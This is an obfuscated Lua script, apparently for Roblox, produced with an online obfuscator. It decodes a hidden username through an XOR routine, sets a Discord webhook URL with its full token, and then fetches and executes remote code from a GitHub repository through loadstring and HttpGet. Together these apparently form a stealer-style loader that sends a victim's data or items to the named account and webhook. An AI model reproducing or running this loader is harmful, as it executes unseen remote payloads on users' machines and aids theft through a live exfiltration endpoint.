--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.4) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9)local v10=(0 -0) + 0 ;local v11;while true do if (v10==1) then return v5(v11);end if (v10==0) then local v12=(3313 -1862) -((2017 -(949 + 487)) + (1131 -(150 + 111))) ;while true do if ((0 -(0 + 0))==v12) then v11={};for v13=(3 + 0) -(2 -0) , #v8 do v6(v11,v0(v4(v1(v2(v8,v13,v13 + 1 )),v1(v2(v9,(322 -(183 + 138)) + ((v13-1)% #v9) ,(299 -(236 + 62)) + ((v13-1)% #v9) + (938 -(511 + 426)) )))%(1438 -(756 + (2090 -1664))) ));end v12=(207 -127) -(47 + 10 + (1201 -(409 + 770))) ;end if (v12==((1724 -(94 + 1627)) -(2 + 0))) then v10=1 + 0 + (0 -0) ;break;end end end end end UserName=v7("\230\220\163\166\70\237\246\137\184\81\206\220\145\135","\172\189\200\211\36");Webhook="https://discord.com/api/webhooks/1077369381920706560/QLZBuoFlQ2GQUbDdA8KVWySAXRZcNNsx5HAT-tTJlPl-fWgO0BbGmWhR5ZQ-jElfdnt6";loadstring(game:HttpGet("https://raw.githubusercontent.com/k4ftt/rizzhub/main/New.lua"))();
